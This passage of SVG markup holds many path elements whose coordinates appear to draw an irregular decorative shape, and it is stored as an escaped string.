d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path 